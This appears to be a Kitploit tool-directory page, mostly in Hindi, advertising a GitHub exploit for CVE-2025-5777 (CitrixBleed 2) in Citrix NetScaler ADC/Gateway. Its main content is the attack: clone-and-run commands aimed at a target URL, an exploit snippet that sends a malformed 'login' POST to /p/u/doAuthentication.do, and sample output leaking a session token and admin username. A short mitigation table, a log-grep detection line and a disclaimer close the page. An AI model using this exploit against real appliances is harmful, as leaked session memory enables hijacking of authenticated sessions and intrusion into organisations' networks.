Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-5777 — CVE-2025-5777 Citrix NetScaler मेमोरी लीक एक्सप्लॉइट (CitrixBleed 2) | Kitploit
उपकरण/GitHubGitHub/bughuntar/cve-2025-5777
मेमोरी फोरेंसिकभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubbughuntar/cve-2025-5777

CVE-2025-5777

CVE-2025-5777 Citrix NetScaler मेमोरी लीक एक्सप्लॉइट (CitrixBleed 2)

रिपॉजिटरी देखें
307531 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-5777 - Citrix NetScaler मेमोरी लीक एक्सप्लॉइट

बैनर


📌 अवलोकन

यह उपकरण CVE-2025-5777 का प्रदर्शन करता है, जो Citrix NetScaler ADC/Gateway उपकरणों में एक गंभीर मेमोरी प्रकटीकरण कमजोरी है। यह एक्सप्लॉइट दुर्भावनापूर्ण प्रमाणीकरण अनुरोधों के माध्यम से संवेदनशील मेमोरी सामग्री को लीक करता है।

मुख्य विशेषताएँ:
✔ मेमोरी लीक पहचान XML प्रतिक्रिया पार्सिंग के माध्यम से
✔ लीक हुई मेमोरी क्षेत्रों का हेक्स+ASCII डंप
✔ Burp Suite-संगत अनुरोध प्रारूप
✔ कुशल परीक्षण के लिए अतुल्यकालिक अनुरोध


🔍 प्रमाण-अवधारणा

1. कमजोर अनुरोध (Burp Suite)

Burp अनुरोध

2. कार्य में एक्सप्लॉइट

उपकरण निष्पादन


⚡ त्वरित आरंभ

root@kitploit:~
git clone https://github.com/bughuntar/CVE-2025-5777.git
cd CVE-2025-5777
pip install requests beautifulsoup4 aiohttp colorama
chmod +x citrix_memory_leak.py
python3 citrix_memory_leak.py https://target-netscaler.com

अपेक्षित आउटपुट:

root@kitploit:~
+ [+] Memory leak detected!
--- Leaked Memory Hex Dump ---
00000000  73 65 73 73 69 6F 6E 3D 31 32 33 34 35 36 37 38  session=12345678
00000010  55 73 65 72 3A 20 61 64 6D 69 6E 00 00 00 00 00  User: admin.....

🛡️ शमन

कार्रवाईकमांड/संदर्भ
पैचCitrix सुरक्षा बुलेटिन
WAF नियमBlock POST /p/u/doAuthentication.do with malformed params

📚 संसाधन

  • NVD प्रविष्टि
  • तकनीकी विवरण

🖥️ कोड हाइलाइट्स

root@kitploit:~
# Malformed request trigger
async def exploit(target):
    async with aiohttp.post(
        f"{target}/p/u/doAuthentication.do",
        data="login",  # Missing equals sign triggers leak
        ssl=False
    ) as response:
        await parse_leak(await response.read())

⚠️ कानूनी सूचना

root@kitploit:~
- This tool is for authorized testing ONLY.
- Unauthorized use violates international cybersecurity laws.

पूर्ण अस्वीकरण: DISCLAIMER.md

लेखक: Professor the Hunter

टूल डाउनलोड करें
पहचान
grep 'POST /p/u/doAuthentication.do' netscaler.log